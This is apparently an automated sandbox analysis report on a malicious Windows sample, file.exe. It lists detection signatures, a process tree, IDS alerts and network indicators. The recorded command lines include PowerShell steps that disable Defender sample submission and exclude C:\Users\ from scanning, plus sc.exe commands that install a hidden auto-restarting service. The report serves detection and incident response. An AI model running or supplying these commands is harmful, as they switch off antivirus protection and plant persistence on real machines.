Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1517355
MD5: 07fc5b4f3a432b09b0d51f8b00ef05f3
SHA1: b098b5f859f45314d5edd03aad9eab420bbdec40
SHA256: d65629e6028c54eb383b310547426ed1907296a14a2e8977b9d469126de1f8a9
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Query firmware table information (likely to detect VMs)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 1108 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 5408 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4128 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6764 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 5488 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3180 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • file.exe (PID: 3800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 07FC5B4F3A432B09B0D51F8B00EF05F3)
  • file.exe (PID: 6132 cmdline: C:\Users\user\Desktop\file.exe MD5: 07FC5B4F3A432B09B0D51F8B00EF05F3)
    • cmd.exe (PID: 6108 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1352 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7332 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7456 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • lr75sq5smrngkif9fpn.exe (PID: 7172 cmdline: "C:\Users\user~1\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)
    • yhar2he6rpt6n0h1w6rh.exe (PID: 7704 cmdline: "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe" MD5: 7D1755E8E41A6C2F08D2FAEFFDF9DAD1)
      • taskkill.exe (PID: 7736 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7792 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7848 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7900 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7944 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 8016 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 8060 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3232 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • main.exe (PID: 7988 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
    • WerFault.exe (PID: 2056 cmdline: C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7216 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 336 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3088 cmdline: C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 3824 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • main.exe (PID: 3260 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3088, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 7988, ProcessName: main.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 1352, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe, ParentProcessId: 7704, ParentProcessName: yhar2he6rpt6n0h1w6rh.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 7848, ProcessName: sc.exe
Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 184.65.173.183, DestinationIsIpv6: false, DestinationPort: 11171, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 7988, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49714
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 7456, ProcessName: powershell.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", CommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\file.exe, ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6132, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", ProcessId: 6108, ProcessName: cmd.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe, ParentProcessId: 7704, ParentProcessName: yhar2he6rpt6n0h1w6rh.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 7848, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 1352, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7136, ProcessName: svchost.exe
Timestamp: 2024-09-25T01:11:15.400506+0200, SID: 2036752, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 94.156.68.124, Source Port: 1122, Destination IP: 192.168.2.7, Destination Port: 49700, Protocol: TCP

AV Detection

Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe; ReversingLabs: Detection: 18%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe; File created: C:\Users\user~1\AppData\Local\Temp\installer.log
Source: Binary string: RfxVmt.pdb source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, T9229YlC.29.dr, update.pkg.18.dr
Source: Binary string: RfxVmt.pdbGCTL source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, T9229YlC.29.dr, update.pkg.18.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FFB22706D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,29_2_00007FFB22706D5F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FFB22706DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,29_2_00007FFB22706DA3
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe; Code function: 13_2_00007FF7E3CE3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,13_2_00007FF7E3CE3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FF7AABD47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FF7AABD47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FFB2270A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB2270A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FFB22731883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB22731883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FFB22765BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB22765BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FFB23AB57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23AB57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FFB23AD5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23AD5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe; Code function: 29_2_00007FFB23B02FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23B02FE3

Networking

Source: Network traffic; Suricata IDS: 2036752 - Severity 1 - ET MALWARE Suspected BPFDoor TCP Magic Packet (Inbound): 94.156.68.124:1122 -> 192.168.2.7:49700
Source: global traffic; TCP traffic: 88.210.6.42 ports 25314,1,2,3,4,5
Source: global traffic; TCP traffic: 141.98.234.85 ports 42069,0,2,4,6,9
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp; String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: lr75sq5smrngkif9fpn.exe.8.dr; Static PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: unknown; Network traffic detected: IP country count 18
Source: Joe Sandbox View; ASN Name: SHAWCA SHAWCA
Source: unknown; TCP traffic detected without corresponding DNS query: 94.156.68.124
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FFB22705EEA recv,WSAGetLastError,29_2_00007FFB22705EEA
Source: global traffic DNS traffic detected: DNS query: time.windows.com
Source: svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000003.1364743733.000001A7F5049000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365723954.000001A7F5042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364541563.000001A7F505F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364293809.000001A7F5086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000000.00000002.1365909778.000001A7F5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364470645.000001A7F5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365624998.000001A7F502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://i2p.ghativega.in/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://i2p.novg.net/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
Source: svchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.livco
Source: svchost.exe, 00000028.00000003.2192382775.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192457979.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192566871.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192487068.0000029864E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: svchost.exe, 00000028.00000002.2528684973.0000029864E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
